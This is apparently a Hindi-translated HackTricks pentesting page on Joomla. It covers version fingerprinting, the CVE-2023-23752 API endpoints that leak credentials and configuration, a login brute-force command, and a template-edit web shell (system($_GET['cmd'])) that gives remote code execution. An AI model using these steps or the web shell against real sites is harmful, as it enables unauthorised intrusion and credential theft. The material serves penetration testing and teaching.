Joomla

Support HackTricks

Joomla Statistics

Joomla कुछ गुमनाम उपयोग सांख्यिकी एकत्र करता है जैसे Joomla, PHP और डेटाबेस संस्करणों का विभाजन और Joomla इंस्टॉलेशन पर उपयोग में आने वाले सर्वर ऑपरेटिंग सिस्टम। इस डेटा को उनके सार्वजनिक API के माध्यम से क्वेरी किया जा सकता है।

curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool

{
"data": {
"cms_version": {
"3.0": 0,
"3.1": 0,
"3.10": 6.33,
"3.2": 0.01,
"3.3": 0.02,
"3.4": 0.05,
"3.5": 12.24,
"3.6": 22.85,
"3.7": 7.99,
"3.8": 17.72,
"3.9": 27.24,
"4.0": 3.21,
"4.1": 1.53,
"4.2": 0.82,
"4.3": 0,
"5.0": 0
},
"total": 2951032
}
}

Enumeration

Discovery/Footprinting

  • मेटा की जांच करें

curl https://www.joomla.org/ | grep Joomla | grep generator

<meta name="generator" content="Joomla! - Open Source Content Management" />
  • robots.txt

# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]
  • README.txt

1- What is this?
* This is a Joomla! installation/upgrade package to version 3.x
* Joomla! Official site: https://www.joomla.org
* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging

Version

  • In /administrator/manifests/files/joomla.xml आप संस्करण देख सकते हैं।

  • In /language/en-GB/en-GB.xml आप Joomla का संस्करण प्राप्त कर सकते हैं।

  • In plugins/system/cache/cache.xml आप एक अनुमानित संस्करण देख सकते हैं।

Automatic

droopescan scan joomla --url http://joomla-site.local/

In 80,443 - Pentesting Web Methodology एक अनुभाग है जो CMS स्कैनर्स के बारे में है जो Joomla को स्कैन कर सकते हैं।

API अनधिकृत जानकारी का प्रकटीकरण:

संस्करण 4.0.0 से 4.2.7 अनधिकृत जानकारी के प्रकटीकरण (CVE-2023-23752) के प्रति संवेदनशील हैं जो क्रेड्स और अन्य जानकारी को डंप करेगा।

  • उपयोगकर्ता: http://<host>/api/v1/users?public=true

  • कॉन्फ़िग फ़ाइल: http://<host>/api/index.php/v1/config/application?public=true

MSF मॉड्यूल: scanner/http/joomla_api_improper_access_checks या रूबी स्क्रिप्ट: 51334

ब्रूट-फोर्स

आप इस स्क्रिप्ट का उपयोग लॉगिन को ब्रूट फोर्स करने के लिए कर सकते हैं।

sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

admin:admin

RCE

यदि आप admin credentials प्राप्त करने में सफल हो गए हैं, तो आप RCE अंदर प्राप्त कर सकते हैं PHP कोड का एक स्निपेट जोड़कर। हम इसे template को कस्टमाइज़ करके कर सकते हैं।

  1. Templates पर क्लिक करें जो Configuration के तहत नीचे बाईं ओर है ताकि टेम्पलेट मेनू खुल सके।

  2. एक template नाम पर क्लिक करें। आइए protostar चुनते हैं जो Template कॉलम हेडर के तहत है। यह हमें Templates: Customise पृष्ठ पर ले जाएगा।

  3. अंत में, आप एक पृष्ठ पर क्लिक कर सकते हैं ताकि पृष्ठ स्रोत खुल सके। आइए error.php पृष्ठ चुनते हैं। हम कोड निष्पादन प्राप्त करने के लिए एक PHP one-liner जोड़ेंगे जैसा कि निम्नलिखित है:

  4. system($_GET['cmd']);

  5. Save & Close

  6. curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id

From XSS to RCE

  • JoomSploit: Joomla शोषण स्क्रिप्ट जो XSS को RCE या अन्य महत्वपूर्ण कमजोरियों में बढ़ाती है। अधिक जानकारी के लिए इस पोस्ट की जांच करें। यह Joomla संस्करण 5.X.X, 4.X.X, और 3.X.X के लिए समर्थन प्रदान करता है, और अनुमति देता है:

  • Privilege Escalation: Joomla में एक उपयोगकर्ता बनाता है।

  • (RCE) Built-In Templates Edit: Joomla में एक Built-In Templates को संपादित करता है।

  • (Custom) Custom Exploits: तृतीय-पक्ष Joomla प्लगइन्स के लिए कस्टम शोषण।

Support HackTricks

Last updated